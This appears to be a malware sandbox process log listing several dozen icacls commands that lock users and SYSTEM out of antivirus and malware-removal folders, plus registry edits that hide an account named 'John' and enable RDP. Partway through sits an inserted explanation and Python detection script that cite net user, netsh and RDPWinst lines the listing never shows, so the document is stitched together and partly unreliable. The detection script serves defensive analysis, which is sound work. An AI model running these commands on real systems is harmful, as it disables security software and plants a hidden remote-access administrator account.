C:\Windows\system32\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)
C:\Windows\system32\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\system32\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\system32\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls C:\FRST /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
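Taken together, the net user, net localgroup, reg add, netsh and RDPWinst.exe -i lines in this listing build one hidden, RDP-reachable administrator: the account is created with a password on the command line, added to the Administrators and Remote Desktop Users groups under several localized names, hidden from the logon screen through Winlogon\SpecialAccounts\UserList, and RDP is enabled and opened in the firewall. The script below is an added example (not part of the sandbox report) that correlates those lines into a per-account summary. GROUP_ROLES is an assumed table of localized group names; on a live host the robust approach is to resolve groups by well-known SID (S-1-5-32-544 Administrators, S-1-5-32-555 Remote Desktop Users, S-1-5-32-580 Remote Management Users). The sample input is copied from the listing, duplicate wrapper lines included.

```python
"""Reconstruct a hidden remote-access account from net/reg/netsh command lines.

Added example, not part of the sandbox report. GROUP_ROLES maps localized
local-group names to roles and is an assumption; prefer SID resolution on a
live host. Repeated lines (cmd.exe -> net.exe -> net1.exe) are harmless
because every update is idempotent.
"""
import re

# Constructed sample: lines copied from the process listing above.
SAMPLE_LINES = [
    r'C:\Windows\system32\cmd.exe /c net user John 12345 /add',
    r'net user John 12345 /add',
    r'C:\Windows\system32\net1 user John 12345 /add',
    r'net localgroup "Администраторы" John /add',
    r'net localgroup "Пользователи удаленного рабочего стола" John /add',
    r'net localgroup "Пользователи удаленного управления" john /add" John /add',
    r'net localgroup "Administrators" John /add',
    r'net localgroup "Administradores" John /add',
    r'net localgroup "Remote Desktop Users" john /add',
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f',
    r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow',
    r'C:\ProgramData\RDPWinst.exe -i',
]

GROUP_ROLES = {  # assumed localized spellings -> role
    "administrators": "admin", "administradores": "admin", "администраторы": "admin",
    "remote desktop users": "rdp", "пользователи удаленного рабочего стола": "rdp",
    "remote management users": "remote_mgmt", "пользователи удаленного управления": "remote_mgmt",
}

USER_ADD_RE = re.compile(r'\bnet1?\s+user\s+(\S+)\s+(\S+)\s+/add\b', re.I)
GROUP_ADD_RE = re.compile(r'\bnet1?\s+localgroup\s+(?:"([^"]+)"|(\S+))\s+(\S+)\s+/add\b', re.I)
HIDE_RE = re.compile(r'\breg\s+add\s+"?HK(?:LM|EY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows NT\\'
                     r'CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"?\s+/v\s+(\S+)\s+/t\s+REG_DWORD\s+/d\s+0\b', re.I)
RDP_ON_RE = re.compile(r'Terminal Server"?\s+/v\s+fDenyTSConnections\s+/t\s+REG_DWORD\s+/d\s+0\b', re.I)
FW_RDP_RE = re.compile(r'\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\bdir=in\b.*\blocalport=3389\b.*\baction=allow\b', re.I)
RDPWINST_RE = re.compile(r'\bRDPWinst\.exe"?\s+-i\b', re.I)


def _account(accounts, name):
    return accounts.setdefault(name.lower(), {
        "name": name, "created": False, "password_on_cmdline": False,
        "roles": set(), "hidden_from_logon_ui": False})


def reconstruct(lines):
    """Return (accounts keyed by lower-case name, host-level RDP state)."""
    accounts = {}
    host = {"rdp_enabled": False, "rdp_firewall_open": False, "rdpwinst_install": False}
    for line in lines:
        if m := USER_ADD_RE.search(line):
            acct = _account(accounts, m.group(1))
            acct["created"] = True
            acct["password_on_cmdline"] = m.group(2) != "*"  # "*" would prompt instead
        if m := GROUP_ADD_RE.search(line):
            group = (m.group(1) or m.group(2)).lower()
            _account(accounts, m.group(3))["roles"].add(GROUP_ROLES.get(group, f"other:{group}"))
        if m := HIDE_RE.search(line):
            _account(accounts, m.group(1))["hidden_from_logon_ui"] = True
        if RDP_ON_RE.search(line):
            host["rdp_enabled"] = True
        if FW_RDP_RE.search(line):
            host["rdp_firewall_open"] = True
        if RDPWINST_RE.search(line):
            host["rdpwinst_install"] = True
    return accounts, host


def hidden_remote_admins(accounts, host):
    """Accounts created, hidden from the logon UI, made administrators, with RDP turned on."""
    return [a["name"] for a in accounts.values()
            if a["created"] and a["hidden_from_logon_ui"] and "admin" in a["roles"]
            and (host["rdp_enabled"] or host["rdp_firewall_open"])]


if __name__ == "__main__":
    accounts, host = reconstruct(SAMPLE_LINES)
    for a in accounts.values():
        print(a["name"], sorted(a["roles"]), "hidden" if a["hidden_from_logon_ui"] else "")
    print(host, "->", hidden_remote_admins(accounts, host))
```

Hidden-user checks that only look at SpecialAccounts\UserList miss accounts that were never hidden, and group checks that only match the English group names miss the localized variants the listing shows; correlating all four signals per account avoids both gaps.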
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
